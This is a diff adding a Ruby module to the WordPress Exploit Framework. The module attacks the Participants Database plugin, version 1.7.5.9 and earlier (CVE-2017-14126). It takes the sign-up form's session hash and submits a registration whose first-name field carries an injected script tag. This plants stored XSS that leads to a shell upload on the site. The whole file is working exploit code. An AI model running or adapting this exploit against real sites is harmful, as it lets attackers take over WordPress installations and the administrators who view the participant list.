|
| 1 | +# frozen_string_literal: true |
| 2 | + |
| 3 | +class Wpxf::Exploit::ParticipantsDatabaseV1759XssShellUpload < Wpxf::Module |
| 4 | + include Wpxf::WordPress::StoredXss |
| 5 | + |
| 6 | + def initialize |
| 7 | + super |
| 8 | + |
| 9 | + update_info( |
| 10 | + name: 'Participants Database <= 1.7.5.9 XSS Shell Upload', |
| 11 | + author: [ |
| 12 | + 'Benjamin Lim', # Vulnerability discovery |
| 13 | + 'rastating' # WPXF module |
| 14 | + ], |
| 15 | + references: [ |
| 16 | + ['CVE', '2017-14126'], |
| 17 | + ['WPVDB', '8896'] |
| 18 | + ], |
| 19 | + date: 'Sep 06 2017' |
| 20 | + ) |
| 21 | + |
| 22 | + register_options([ |
| 23 | + StringOption.new( |
| 24 | + name: 'sign_up_path', |
| 25 | + desc: 'The relative path of the Participants Database sign up page', |
| 26 | + required: true |
| 27 | + ) |
| 28 | + ]) |
| 29 | + end |
| 30 | + |
| 31 | + def check |
| 32 | + check_plugin_version_from_readme('participants-database', '1.7.5.10') |
| 33 | + end |
| 34 | + |
| 35 | + def vulnerable_page |
| 36 | + 'the page containing the participant list' |
| 37 | + end |
| 38 | + |
| 39 | + def sign_up_url |
| 40 | + normalize_uri(full_uri, datastore['sign_up_path']) |
| 41 | + end |
| 42 | + |
| 43 | + def fetch_nonce |
| 44 | + res = execute_get_request(url: sign_up_url) |
| 45 | + return res.body[/name="session_hash"\s+type="hidden"\s+value="([a-z0-9]+)"/i, 1] if res && res.code == 200 |
| 46 | + end |
| 47 | + |
| 48 | + def before_store |
| 49 | + self.session_hash = fetch_nonce |
| 50 | + |
| 51 | + if session_hash.nil? |
| 52 | + emit_error 'Failed to retrieve session hash / nonce' |
| 53 | + return false |
| 54 | + end |
| 55 | + |
| 56 | + true |
| 57 | + end |
| 58 | + |
| 59 | + def store_script |
| 60 | + execute_post_request( |
| 61 | + url: sign_up_url, |
| 62 | + body: { |
| 63 | + 'action' => 'signup', |
| 64 | + 'subsource' => 'participants-database', |
| 65 | + 'shortcode_page=' => datastore['sign_up_path'], |
| 66 | + 'thanks_page' => datastore['sign_up_path'], |
| 67 | + 'instance_index' => '2', |
| 68 | + 'pdb_data_keys' => '1.2.9.10', |
| 69 | + 'session_hash' => session_hash, |
| 70 | + 'first_name' => "<script>#{xss_include_script}</script>#{Wpxf::Utility::Text.rand_alpha(6)}", |
| 71 | + 'last_name' => Wpxf::Utility::Text.rand_alpha(6), |
| 72 | + 'email' => Wpxf::Utility::Text.rand_email, |
| 73 | + 'mailing_list' => 'No', |
| 74 | + 'submit_button' => 'Submit' |
| 75 | + } |
| 76 | + ) |
| 77 | + end |
| 78 | + |
| 79 | + attr_accessor :session_hash |
| 80 | +end |
0 commit comments